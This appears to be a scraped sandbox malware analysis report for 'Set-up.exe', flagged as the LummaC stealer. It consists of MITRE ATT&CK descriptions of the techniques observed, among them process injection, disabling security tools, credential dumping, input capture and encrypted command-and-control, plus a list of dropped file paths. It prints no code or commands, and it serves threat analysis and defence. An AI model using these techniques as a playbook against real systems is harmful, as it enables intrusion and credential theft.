Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 'Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\F

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Believe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Breasts

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Breasts.cmd (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Childrens

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Collective

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Debate

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Descriptions

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Educators

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Entire

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fascinating

Windows Analysis Report
'Set-up.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre